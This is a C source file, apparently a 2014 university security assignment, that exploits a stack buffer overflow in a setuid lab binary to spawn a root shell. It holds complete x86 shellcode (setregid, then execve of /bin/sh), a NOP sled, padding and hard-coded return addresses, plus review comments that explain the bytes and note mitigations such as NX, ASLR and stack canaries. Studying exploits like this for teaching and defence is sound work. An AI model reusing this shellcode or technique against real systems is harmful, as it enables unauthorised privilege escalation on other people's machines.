Using a stack overflow to spawn a root shell off a setuid executable - University assignment of Internet Security 1 in the summer term of 2014
#include <stdio.h> // printf | |
#include <stdlib.h> // malloc | |
#include <string.h> // strlen strncpy | |
#include <unistd.h> //execl | |
/*
 * Payload constants for the assignment target.
 *
 * nop: '\220' is octal 220 = 0x90, the one-byte x86 NOP. main() repeats it
 * to build the "nop sledge" that precedes the shellcode.
 *
 * shellcode: 32-bit Linux x86 machine code using the int $0x80 system call
 * interface (syscall numbers 71 = setregid, 11 = execve, 1 = exit, per the
 * per-instruction comments below). The trailing "/bin/sh " and "---" bytes
 * are data that the code itself patches at run time (the writes to
 * 0x7(%esi), 0x8(%esi) and 0xc(%esi)). Because it is a string literal,
 * main() measures it with strlen(), which only works because no byte of the
 * encoding is 0x00 — anyone editing the bytes needs to preserve that.
 *
 * NOTE(review): the payload assumes the target's stack is executable and at
 * a fixed address (main() hard-codes the saved stack pointer and return
 * address); NX/DEP, ASLR or a stack canary on the target would each defeat
 * this, which is why the assignment binary presumably ran without them. On
 * a hardened host, a setuid process that calls setregid() and then
 * execve("/bin/sh") is exactly the kind of event to audit for.
 */
char nop = '\220';
char *shellcode =
// setregid(-1, 201)
"\x29\xc0" // subl %eax, %eax
"\xb0\x47" // movb $71, %al <-- Syscall 71 = setregid
"\x29\xdb" // subl %ebx, %ebx <-- Nullify first parameter
"\xb3\xc9" // movb $201, %bl <-- Second param: group => 201 (which will reside first in ebx ...)
"\x89\xd9" // movl %ebx, %ecx <-- Now the second param is in place
"\x29\xdb" // subl %ebx, %ebx <-- Again nullify first parameter
"\x83\xeb\x01" // sub %ebx, -1 <-- First param: user => -1 (= no change)
"\xcd\x80" // int $0x80
// Preparations of the shell execution
"\xeb\x1f" // jmp 0x1f <-- 1) Go to the last call stmt to get the address of the string
"\x5e" // popl %esi <-- and ff. all that address finding fun
"\x89\x76\x08" // movl %esi,0x8(%esi)
"\x31\xc0" // xorl %eax,%eax
"\x88\x46\x07" // movb %eax,0x7(%esi)
"\x89\x46\x0c" // movl %eax,0xc(%esi)
// execve("/bin/sh", "sh")
"\xb0\x0b" // movb $0xb,%al <-- Syscall 11 = execve
"\x89\xf3" // movl %esi,%ebx <-- First param: address of the /bin/sh string
"\x8d\x4e\x08" // leal 0x8(%esi),%ecx <-- Second param: argv[0] = program name = sh
"\x8d\x56\x0c" // leal 0xc(%esi),%edx <-- Third param: null pointer
"\xcd\x80" // int $0x80 <-- Kernel mode!
// exit(0)
"\x31\xdb" // xorl %ebx,%ebx <-- First param: 0
"\x89\xd8" // movl %ebx,%eax
"\x40" // inc %eax <-- Syscall 1 = exit
"\xcd\x80" // int $0x80 <-- Kernel mode!
"\xe8\xdc\xff\xff\xff" // call -0x24 <-- 1) Go back to the normal program run
// "/bin/grade"
"/bin/sh "
"---";
/*
 * Builds the argument string and exec()s the assignment's vulnerable setuid
 * binary with it. The bytes written to evil_argument, in order:
 *   nop sledge (185 - strlen(shellcode) bytes) | shellcode | 106 x '.' |
 *   one "length" byte ('\52') | 9 x '.' | 4-byte saved stack pointer |
 *   4-byte saved eip | '\0'
 * Every size and both 4-byte addresses are specific to the 2014 target
 * build (/usr/local/bin/vuln1) and will not match any other binary.
 *
 * argc/argv are unused; the buffer is passed as argv[1] of the target.
 *
 * NOTE(review): `void main` is not standard C — it should be `int main`.
 * execl() only returns on failure and that return value is not checked,
 * so a missing or non-executable target fails silently.
 */
void main(int argc, char* argv[]) {
    int i;
    int offset = 0;
    // strlen() returns size_t, so `185 - strlen(...)` is computed unsigned
    // and then narrowed to int. That is harmless while the shellcode is
    // shorter than 185 bytes, which it is here.
    int nops = 185 - strlen(shellcode);
    // NOTE(review): `sizeof shellcode` is the size of the pointer (4 or 8),
    // not the string length. Since nops + strlen(shellcode) is always 185,
    // the buffer is effectively sized by the constants plus 10 bytes of
    // slack; the 310 bytes actually written below fit on either pointer size.
    int argument_size = nops + sizeof shellcode + 106 + 1 + 8 + 4 + 4 + 10;
    char* evil_argument = malloc(argument_size +1);
    if (evil_argument == NULL) {
        printf("malloc failed"); // goes to stdout without a newline
        exit(1);
    }
    // Prepare the nop sledge
    for (i=0; i<nops; i++) {
        evil_argument[offset++] = nop;
    }
    // Add shellcode. strncpy with the exact length copies no terminator,
    // which is intended here because more bytes follow.
    strncpy(&evil_argument[nops], shellcode, strlen(shellcode));
    offset += strlen(shellcode);
    // Add 106 Bytes filler
    for (i=0; i<106; i++) {
        evil_argument[offset++] = '.';
    }
    // Length stack element ('\52' is octal 52 = 0x2a = '*')
    evil_argument[offset++] = '\52';
    // 8 Bytes filler
    // NOTE(review): the loop bound is 9, so nine bytes are written, not the
    // eight the comment states; the loop, not the comment, is what runs.
    for (i=0; i<9; i++) {
        evil_argument[offset++] = '.';
    }
    // \250\365\377\277 (= saved stack pointer)
    strncpy(&evil_argument[offset], "\250\365\377\277", 4);
    offset += 4;
    // \200\364\377\277 (= saved eip)
    // NOTE(review): the literal below is "\xe0\xf4\xff\xbf"; its first byte
    // (0xe0) differs from the \200 (0x80) in the comment above. The literal
    // is what gets written.
    strncpy(&evil_argument[offset], "\xe0\xf4\xff\xbf", 4);
    offset += 4;
    // Terminate so execl() hands the buffer over as one argv[1] string.
    evil_argument[offset++] = '\0';
    // Replaces this process image on success; evil_argument is never freed,
    // which does not matter once exec succeeds.
    execl ("/usr/local/bin/vuln1", "/usr/local/bin/vuln1", evil_argument, (char *)NULL);
}